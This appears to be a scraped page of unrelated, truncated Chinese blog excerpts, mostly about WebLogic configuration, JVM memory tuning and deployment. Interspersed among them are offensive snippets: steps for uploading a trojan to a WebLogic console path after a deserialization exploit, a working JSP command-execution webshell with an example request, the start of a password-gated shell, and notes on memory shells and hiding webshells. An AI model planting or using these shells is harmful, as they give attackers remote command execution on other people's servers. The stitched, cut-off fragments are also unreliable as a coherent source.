1. 检查weblogic.xml配置文件,其中如果有: <jsp-descriptor> <jsp-param> <param-name>pageCheckSeconds</param-name <param-value>-</param-value> </jsp-param> </jsp-descriptor> <container-descriptor> <servlet-reload-che

Weblogic jsp页面编译出错,Weblogic jsp编译异常 ======================== 蕃薯耀 2018年1月29日 http://www.cnblogs.com/fanshuyao/ 一.问题描述: 将项目部署到Weblogic下启动后,jsp页面编译出错,提示如下: weblogic.servlet.jsp.CompilationException:Failed to complile :JSP/xxx.jsp: Type mismatch: cannot 

我们经常在使用WebLoigc部署应用程序后,发现程序运行速度并不是很快,遇到这种情况我们可以尝试调整启动时分配的内存,设置方法有两种: 一.在../domain/setDomainEnv.sh文件中设置: 二.在weblogic直接设置:

问题描述: 当我们在weblogic服务器一个域domain上面部署多个工程时,经常会出现内存溢出的情况:java.lang.OutOfMemoryError异常 原因:主要是因为weblogic环境配置的启动jvm参数比较小,只要把对应的参数调大一些就可以了. 解决方法:1:找到自己的域: C:\bea\user_projects\domains\base_domain\bin下 setDomainEnv.cmd文件. 2:设置参数将里面jvm参数相应的扩大一倍即可.

我们经常在使用WebLoigc部署应用程序后,发现程序运行速度并不是很快,遇到这种情况我们可以尝试调整启动时分配的内存,设置方法有两种:    一.在..\domain\startWebLoigc.***文件中设置    在startWebLogic.bat或startWebLogic.sh中找到以下内容,在其下方添加需要设置的内存 Java代码   echo *************************************************** echo *  To start

对于反序列化漏洞,如果获得的是系统权限或者root权限,那就没必要上传木马,但如果只是web安装应用的权限,就上传获取更大权限. 上传需要找到几个点,获取物理路径,如下面三种: 方法1:把shell写到控制台images目录中 \Oracle\Middleware\wlserver_10.3\server\lib\consoleapp\webapp\framework\skins\wlsconsole\images\shell.jsp 目录上传木马, 访问 http://*.*.*.*:7001

一.无回显的命令执行(命令执行后不会在前端页面返回数据) <%Runtime.getRuntime().exec(request.getParameter("i"));%> 请求url:http://127.0.0.1/shell.jsp?i=whoami 二.有回显带密码的命令执行(命令执行后会在前端返回数据) <% if("023".equals(request.getParameter("pwd"))){ java.io.

打开server 的配置界面: 其中 修改on update Action 为 Redeploy On frame deactivation 为Update classes and resources

在主机上domins中存在stage目录,且删除相关文件后页面访问报404 mc11>home/ap/user/domins/user/stage/project/project.war/js/common 设置webloic中环境->服务器->控制->选中server->配置->临时模式”不存放“,然后重启 扫描频率:布署->配置

<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%> <%!String Pwd = "pass"; String EC(String s, String c) throws Exception { return s; }//new String(s.getBytes("ISO-8859-1"),c);} Connection GC(

每个weblogic server 都是运行在一个java虚拟机上 ,对weblogic的内存设置也就是对java虚拟机的内存设置. MEM_ARGS=-Xms512m -Xmx1024m -XX:MaxPermSize=128m -Xms512m表示jvm内存下限为512m -Xmx512m表示jvm内存上限为1024m -XX:MaxPermSize=128m表示永久内存为128m 我们主要设置的为jvm内存,永久内存设置为128m或者256m即可. 设置jvm内存时,根据经验32位机器最大

修改weblogic 使用内存 修改位置:startWeblogic.sh 在最开头增加使用内存配置信息如下: 我的服务器配置 内存:32G   ,CPU:16  根据实际情况配置 #!/bin/sh   # WARNING: This file is created by the Configuration Wizard. # Any changes to this script may be lost when adding extensions to this configuration.

BEA WebLogic平台下J2EE调优攻略   2008-06-25 作者:周海根 出处:网络   前 言 随着近来J2EE软件广泛地应用于各行各业,系统调优也越来越引起软件开发者和应用服务器提供商的重视.而对于最终客户来说,在一个高效.稳定地实现他们的业务需求已经是他们的基本要求.所以J2EE调优显得非常重要,而BEA WebLogic Server是业界领先的应用服务器,BEA WebLogic平台下的J2EE调优也就尤为重要,她将为我们提供普遍的J2EE调优方案.最近网络.杂志上的J2

1. Weblogic安装 1.1 Linux下安装过程 安装环境: 操作系统: redhat-release-5Server-5.4.0.3 Weblogic版本: Weblogic 9.24 1)       部署前准备: 创建weblogic用户组. groupadd weblogic useradd –g weblogic weblogic passwd weblogic(修改weblogic密码) 创建/Oracle 目录,修改目录所有者权限 mkdir /Oracle chown –

一.     漏洞简介 漏洞编号和级别 CVE编号:CVE-2019-2725,危险级别:高危,CVSS分值:9.8. CNVD 编号:CNVD-C-2019-48814,CNVD对该漏洞的综合评级为“高危”. 漏洞概述 2019年4月17日,国家信息安全漏洞共享平台(CNVD)收录了由中国民生银行股份有限公司报送的Oracle WebLogic wls9-async反序列化远程命令执行漏洞(CNVD-C-2019-48814).WebLogic是美国Oracle公司出品的Java应用服务器,W

Java安全之基于Tomcat实现内存马 0x00 前言 在近年来红队行动中,基本上除了非必要情况,一般会选择打入内存马,然后再去连接.而落地Jsp文件也任意被设备给检测到,从而得到攻击路径,删除webshell以及修补漏洞,内存马也很好的解决了反序列化回显的问题.但是随着红蓝攻防持续博弈中,一些内存马的查杀工具也开始逐渐开始出现.成型.所以有必要研究一下内存马的实现. 0x01 Tomcat架构分析 需要了解基于tomcat内存马实现还得去分析tomcat的一些处理机制以及结构.而在Tomca

atitit.木马病毒webshell的原理and设计 java c# .net php. 1. 隐蔽性 编辑 WebShell后门具有隐蔽性,一般有隐藏在正常文件中并修改文件时间达到隐蔽的,还有利用服务器漏洞进行隐藏,如 "..." 目录就可以达到,站长从FTP中找到的是含有“..”的文件夹,而且没有权限删除,还有一些隐藏的WEBSHELL,可以隐藏于正常文件带参数运行脚本后门. webshell可以穿越服务器防火墙,由于与被控制的服务器或远程过80端口传递的,因此不会被防火墙拦截.

在Linux系统内存中的虚拟磁盘映射,可以理解为使用物理内存当做磁盘,利用这种文件系统,可以有效提高在高并发场景下的磁盘读写,但是重启后数据会丢失. 1.查看tmpfs路径 (系统默认开启,大小约为物理内存一半) 2.查看物理内存利用情况  (-m  代表按照M统计) 3.调整tmpfs内存大小  (立刻生效但重启后会恢复) 5.永久修改 /etc/fstab 文件 用途:nginx cache 文件路径可以存放到此目录,减少磁盘IO的访问量

总结将SSH项目部署到weblogic遇到的坑.项目中是SSH,另外还用到了webservice.quartz等框架.在tomcat部署是可以的,现在总结部署到weblogic遇到的坑. 在这里说一下前提工作,前提工作将项目的日志文件输出到指定位置,便于查看自己的项目的启动情况,结合wenlogic的日志可以快速的定位到错误所在地.另外项目中读取的外部文件 要查看好,比如properties文件的读取,数据源的配置.我在适配过程中由于数据源问题导致weblogic一直发生死锁.在适配之前确保数据

这里的基本目录%base%表示安装目录,如我的目录为:E:/weblogic就是%base% 1.weblogic目录介绍 weblogic主要的目录介绍: 1.日志目录: 每个domain(域)都有自己的日志目录,一般启动日志是AdmiServer.log,存放位置在:%base%\user_projects\domains\base_domain\servers\AdminServer\logs,如下:  2.项目发布目录: 每个域也都有自己的项目发布目录.存放位置在:%base%\user